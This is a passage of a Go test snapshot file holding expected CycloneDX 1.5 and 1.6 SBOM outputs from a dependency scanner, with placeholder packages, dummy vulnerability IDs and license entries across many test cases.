"credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX15_WithVulnerabilities/one_source_with_one_package_and_one_vulnerability - 1] { "$schema": 
"http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX15_WithVulnerabilities/one_source_with_one_package_and_one_vulnerability_(dev) - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX15_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_uncalled_vulnerability - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "GHSA-123", "references": [ { "id": "OSV-1", "source": {} } ], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- 
[TestPrintCycloneDXResults/CycloneDX15_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_vulnerability_with_a_max_severity - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "GHSA-123", "references": [ { "id": "OSV-1", "source": {} } ], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX15_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_vulnerability_without_a_max_severity - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "GHSA-123", "references": [ { "id": "OSV-1", "source": {} } ], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX15_WithVulnerabilities/one_source_with_one_package_with_both_a_version_and_commit_and_one_vulnerability - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { 
"bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX15_WithVulnerabilities/one_source_with_one_package_with_just_a_commit_and_one_vulnerability - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1", "type": "library", "name": "mine1", "licenses": [], "purl": "pkg:npm/mine1" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX15_WithVulnerabilities/one_source_with_vulnerabilities,_some_missing_content - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine3@0.10.2-rc", "type": "library", "name": "mine3", "version": "0.10.2-rc", "licenses": [], "purl": "pkg:npm/mine3@0.10.2-rc" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [], "detail": "This vulnerability allows for some very scary stuff to happen - seriously, you'd not believe it!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-2", "references": [], "ratings": [], "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX15_WithVulnerabilities/two_sources_with_packages,_one_vulnerability - 1] { "$schema": 
"http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine2@5.9.0", "type": "library", "name": "mine2", "version": "5.9.0", "licenses": [], "purl": "pkg:npm/mine2@5.9.0" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX15_WithVulnerabilities/two_sources_with_the_same_vulnerable_package - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX16_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_no_license_violations - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine1@1.3.5", "type": "library", "name": "mine1", "version": "1.3.5", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine1@1.3.5" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [ { "license": { "id": "ISC" } } ], "purl": 
"pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX16_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_some_license_violations - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine1@1.3.5", "type": "library", "name": "mine1", "version": "1.3.5", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine1@1.3.5" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [ { "license": { "id": "Apache-2.0" } } ], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX16_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_some_license_violations#01 - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } }, { "license": { "id": "Apache-2.0" } } ], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine1@1.3.5", "type": "library", "name": "mine1", "version": "1.3.5", "licenses": [ { "license": { "id": "Apache-2.0" } } ], "purl": "pkg:npm/mine1@1.3.5" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": 
"3.2.5", "licenses": [ { "license": { "id": "UNKNOWN" } } ], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [ { "license": { "id": "Apache-2.0" } } ], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX16_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_some_license_violations - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:composer/author1/mine1@1.2.3", "type": "library", "name": "author1/mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:composer/author1/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [ { "license": { "id": "Apache-2.0" } } ], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine3@0.4.1" }, { "bom-ref": "pkg:nuget/mine1@1.3.5", "type": "library", "name": "mine1", "version": "1.3.5", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:nuget/mine1@1.3.5" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX16_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages_and_groups,_some_license_violations - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine1@1.3.5", "type": "library", "name": "mine1", "version": "1.3.5", "licenses": [ { "license": { "id": "ISC" } } ], "purl": 
"pkg:npm/mine1@1.3.5" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [ { "license": { "id": "Apache-2.0" } } ], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX16_WithLicenseViolations/multiple_sources_with_no_packages - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX16_WithLicenseViolations/no_sources - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX16_WithLicenseViolations/one_source_with_no_packages - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX16_WithLicenseViolations/one_source_with_one_package,_no_license_violations - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX16_WithLicenseViolations/one_source_with_one_package,_no_licenses - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", 
"licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX16_WithLicenseViolations/one_source_with_one_package_and_an_unknown_license - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "UNKNOWN" } } ], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX16_WithLicenseViolations/one_source_with_one_package_and_multiple_license_violations - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } }, { "license": { "id": "Apache-2.0" } } ], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX16_WithLicenseViolations/one_source_with_one_package_and_one_license_violation - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX16_WithLicenseViolations/one_source_with_one_package_and_one_license_violation_(dev) - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [] } --- 
[TestPrintCycloneDXResults/CycloneDX16_WithLicenseViolations/one_source_with_one_package_with_both_a_version_and_a_commit_and_one_license_violation - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX16_WithLicenseViolations/one_source_with_one_package_with_just_a_commit_and_one_license_violation - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1", "type": "library", "name": "mine1", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX16_WithLicenseViolations/two_sources_with_packages,_one_license_violation - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine2@5.9.0", "type": "library", "name": "mine2", "version": "5.9.0", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine2@5.9.0" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX16_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages,_some_called_vulnerabilities_and_license_violations - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { 
"license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine1@1.3.5", "type": "library", "name": "mine1", "version": "1.3.5", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.3.5" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-2", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something less scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX16_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages,_some_vulnerabilities_and_license_violations - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine1@1.3.5", "type": "library", "name": "mine1", "version": "1.3.5", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.3.5" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [ { "id": "OSV-1", 
"references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-2", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something less scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX16_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages_with_versions_and_commits,_some_vulnerabilities_and_license_violations - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine1@1.3.5", "type": "library", "name": "mine1", "version": "1.3.5", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.3.5" }, { "bom-ref": "pkg:npm/mine2", "type": "library", "name": "mine2", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine2" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-2", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something less scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX16_WithMixedIssues/one_source_in_working_directory_with_one_package,_one_vulnerability,_and_one_license_violation - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, 
"components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX16_WithMixedIssues/one_source_with_one_deprecated_package - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/deprecated-pkg@1.0.0", "type": "library", "name": "deprecated-pkg", "version": "1.0.0", "licenses": [], "purl": "pkg:npm/deprecated-pkg@1.0.0", "properties": [ { "name": "deprecated", "value": "true" } ] } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX16_WithMixedIssues/one_source_with_one_package,_one_called_vulnerability,_and_one_license_violation - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX16_WithMixedIssues/one_source_with_one_package,_one_uncalled_vulnerability,_and_one_license_violation - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": 
"pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX16_WithMixedIssues/one_source_with_one_package,_one_vulnerability,_and_one_license_violation - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX16_WithMixedIssues/two_sources_with_packages,_one_vulnerability,_one_license_violation - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine2@5.9.0", "type": "library", "name": "mine2", "version": "5.9.0", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine2@5.9.0" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX16_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_grouped_packages,_and_multiple_vulnerabilities - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { 
"bom-ref": "pkg:npm/mine1@1.2.2", "type": "library", "name": "mine1", "version": "1.2.2", "licenses": [], "purl": "pkg:npm/mine1@1.2.2" }, { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-2", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something less scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-3", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something mildly scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-5", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scarier!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX16_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_and_multiple_vulnerabilities - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.2", "type": "library", "name": "mine1", "version": "1.2.2", "licenses": [], "purl": "pkg:npm/mine1@1.2.2" }, { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [], "purl": 
"pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-2", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something less scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-3", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something mildly scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-5", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scarier!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX16_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_no_vulnerabilities - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine1@1.3.5", "type": "library", "name": "mine1", "version": "1.3.5", "licenses": [], "purl": "pkg:npm/mine1@1.3.5" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", 